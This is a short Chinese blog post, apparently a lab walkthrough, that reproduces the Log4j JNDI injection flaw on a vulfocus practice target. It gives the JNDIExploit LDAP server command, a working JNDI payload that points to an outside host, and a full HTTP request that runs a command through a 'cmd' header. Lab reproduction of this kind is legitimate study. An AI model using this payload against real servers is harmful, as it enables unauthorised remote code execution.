前言
關於這個漏洞,啥都不用說了,直接發車。
工具下載
JNDIExploit:https://github.com/0x727/JNDIExploit
復現過程
-
啟動靶場環境
直接用vulfocus啟一個環境。
官網地址:http://vulfocus.fofa.so/
沒註冊的先註冊,進來首頁即可看到靶場
-
用JNDIExploit啟一個ldap的服務。
-
命令如下:
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0
-
接著將payload更改如下:
payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}注意Content-Type的型別為:application/x-www-form-urlencoded
在請求頭中新增cmd欄位,後面跟上需要執行的命令即可。完整資料包如下:
POST /hello HTTP/1.1 Host: vulfocus.fofa.so:41624 Content-Type: application/x-www-form-urlencoded cmd: whoami Content-Length: 47 payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
成功回顯命令:
後記
使用公開靶場或自己搭建環境進行漏洞的復現和研究,是完全沒問題的,但切忌隨意在網際網路進行大範圍未授權測試,因為總會有人來收拾這一地雞毛。